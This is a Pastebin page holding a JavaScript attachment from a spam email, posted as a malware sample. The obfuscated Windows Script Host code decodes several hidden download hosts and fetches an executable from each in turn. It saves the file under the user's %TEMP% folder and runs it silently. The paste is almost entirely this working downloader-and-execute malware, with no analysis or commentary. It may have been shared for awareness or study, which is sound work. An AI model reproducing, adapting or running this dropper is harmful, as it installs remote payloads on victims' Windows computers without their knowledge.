API tools faq
paste
Advertisement
goebelmasse

Javascript-Schadsoftware-Anhang einer Spammail

goebelmasse
Mar 1st, 2016
416
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 2.50 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. function inRYegGzC(GJaRFJrtZko) {
  4. var MrEYqHuW = WScript.CreateObject("Wscript.Shell");
  5. MrEYqHuW.Run(GJaRFJrtZko, 0x1, 0x0);
  6. }
  7. function VgxFwAHCr(PtUAL,LlFXs,FlysN) {
  8. var mkLge = "NdGVLQ Bpp pt.Shell bllEtPp Scri".split(" ");
  9. var iGI=((1)?"W" + mkLge[4]:"")+mkLge[2];
  10. var pt = WScript.CreateObject(iGI);
  11. var Gk = "%TEMP%\\";
  12. return pt.ExpandEnvironmentStrings(Gk);
  13. }
  14. function OdqYYdyX() {
  15. var xAcDuWW = "ipting";
  16. var grQibGokBt = "ile";
  17. var xJpUs = "System";
  18. return "Sc" + "r" + xAcDuWW + ".F" + grQibGokBt + xJpUs + "Obj" + "ect";
  19. }
  20. function eWoi(imumB) {
  21. return WScript.CreateObject(imumB);
  22. }
  23. function BCqs(tiLfc,OztrY) {
  24. tiLfc.write(OztrY);
  25. }
  26. function DKdw(ReLQG) {
  27. ReLQG.open();
  28. }
  29. function kVOM(OtVRo,bQfrW) {
  30. OtVRo.saveToFile(bQfrW,967-965);
  31. }
  32. function qdXC(NJfpu,eKPkH,suJDl) {
  33. NJfpu.open(suJDl,eKPkH,false);
  34. }
  35. function eaom(RCxQE) {
  36. if (RCxQE == 975-775){return true;} else {return false;}
  37. }
  38. function DGGa(ugtoW) {
  39. if (ugtoW > 170089-579){return true;} else {return false;}
  40. }
  41. function zoYB(Ybfwv) {
  42. var VOEVr="";
  43. for(j=(433-433); j < Ybfwv.length; j++)
  44. if (j % (179-177) != (304-304)) {
  45. VOEVr += Ybfwv.substr(j, 957-956);
  46. }
  47. return VOEVr;
  48. }
  49. function aPJG(Kgoie) {
  50. Kgoie.send();
  51. }
  52. function muxg(TIMdT) {
  53. return TIMdT.status;
  54. }
  55. var yQ="0tyhNi6szivsGiWtQsqqQqx.Uc7owmo/T6N9L.reWxxej?l 4omhriEysodu1nBg1bzutydf8fi.IcDo9mh/x6J9t.MeLxaek?l M?x d?f I?";
  56. var m = zoYB(yQ).split(" ");
  57. var HnS = VgxFwAHCr("qQHr","QWyZf","lMxsrd");
  58. var lnR = new ActiveXObject(OdqYYdyX());
  59. var PAfC = HnS+"gCQQtMh\\";
  60. try{
  61. lnR.CreateFolder(PAfC);
  62. }catch(Nxfyoh){
  63. };
  64. var Cdk = "2.XMLH";
  65. var PVo = (Cdk + "TTP" + " qrdKixY yufRR XML ream St tpRdoTVk AD ZPRWRnX OD").split(" ");
  66. var ua = true  , Laak = PVo[7] + "" + PVo[9];
  67. var lo = eWoi("MS"+PVo[3]+(525261, PVo[0]));
  68. var CJf = eWoi(Laak + "B." + PVo[5]+(689665, PVo[4]));
  69. var VWV = 0;
  70. var K = 1;
  71. var TnYmoIC = 833555;
  72. var O=VWV;
  73. while (true)  {
  74. if(O>=m.length) {break;}
  75. var ap = 0;
  76. var xzS = ("ht" + " DBUIFTI tp kDeqN RHNqiQAB :// laYRvLL .exe  GET").split(" ");
  77. try  {
  78. qdXC(lo,xzS[0]+xzS[2]+xzS[5]+m[O]+K, "GET"); aPJG(lo); if (eaom(muxg(lo)))  {      
  79. DKdw(CJf); CJf.type = 1; BCqs(CJf,lo.responseBody); if (DGGa(CJf.size))  {
  80. ap = 1; CJf.position = 0; kVOM(CJf,/*EAa982l7jX*/PAfC/*dub829fDxZ*/+TnYmoIC+xzS[7]); try  {
  81. if (((new Date())>0,793708888)) {
  82. inRYegGzC(PAfC+TnYmoIC+/*KEKW17I1vu*/xzS[7]/*nexd42SjGg*/);
  83. break;
  84. }
  85. }
  86. catch (Ee)  {
  87. };
  88. }; CJf.close();
  89. };
  90. if (ap == 1)  {
  91. VWV = O; break;
  92. };
  93. }
  94. catch (Ee)  {
  95. };
  96. O++;
  97. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!